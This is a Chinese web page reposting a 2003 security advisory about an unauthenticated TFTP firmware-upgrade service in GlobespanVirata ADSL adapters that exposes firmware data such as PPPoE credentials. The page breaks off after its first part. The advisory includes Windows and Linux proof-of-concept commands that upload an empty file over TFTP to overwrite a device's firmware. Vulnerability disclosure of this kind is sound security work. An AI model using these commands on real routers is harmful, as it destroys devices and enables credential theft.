信息提供：安全公告（或线索）提供热线：51cto.editor@_程序员之家(GlobespanVirata ADSL 远程升级服务攻击漏洞)

开发技术指南» 文章正文

引言：信息提供：安全公告（或线索）提供热线：51cto.editor@

摘要：信息提供：安全公告（或线索）提供热线：51cto.editor@gmail.com漏洞类别：设计错误攻击类型：远程进入系统发布日期：2003-02-28更新日期：2003-03-03受影响系统：globespanvirata adsl tftpd安全系统：无漏洞报告人：jlwhc （nsfocus@163.com）漏洞描述：globespanvirata adsl是一款家用adsl适配器，本身具有......

·dynalink rta 230 adsl router默认后门帐户漏洞 »显示摘要«

摘要：信息提供：安全公告（或线索）提供热线：51cto.editor@gmail.com 漏洞类别：默认后门帐户漏洞攻击类型：远程攻击发布日期： 2004-09-03 更新日期： 2004-09-07 受影响系统： dynalink rta 230 adsl router 安全系统：无漏......

GlobespanVirata ADSL 远程升级服务攻击漏洞

【程序编程相关:线程与Swing】

【推荐阅读:解析Java的多线程机制(1)】

信息提供: 【扩展信息:java多线程数据库操作】

安全公告（或线索）提供热线:51cto.editor@gmail.com

漏洞类别:

设计错误

攻击类型:

远程进入系统

发布日期:

2003-02-28

更新日期:

2003-03-03

受影响系统:

globespanvirata adsl tftpd

安全系统:

无

漏洞报告人:

jlwhc （nsfocus@163.com）

漏洞描述:

globespanvirata adsl是一款家用adsl适配器,本身具有路由,防火墙,虚拟拨号等众多功能,支持远程tftp对firmware软体升级.

由于globespanvirata adsl的tftpd不存在安全验证机制,导致任何网络用户可以对adsl适配器非法上传或者下载firmware的内部数据（包括内部敏感信息,比如pppoe帐号）.

攻击者可以远程利用tftpd软件对adsl适配器发送请求实现攻击.

win2000下

-------------------------------------

c:\echo > null.rom

tftp -i xxx.xxx.xxx.xxx put null.rom

-------------------------------------

linux下

firewall# echo > null.rom

tftp xxx.xxx.xxx

put null.rom

... 下一页

·zoom model 5560 x3 ethernet adsl modem默认后门帐户漏洞 »显示摘要«

摘要：信息提供：安全公告（或线索）提供热线：51cto.editor@gmail.com 漏洞类别：默认后门帐户漏洞攻击类型：远程攻击发布日期： 2004-07-06 更新日期： 2004-07-12 受影响系统： zoom model 5560 x3 ethernet adsl modem 安全系统： ......

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：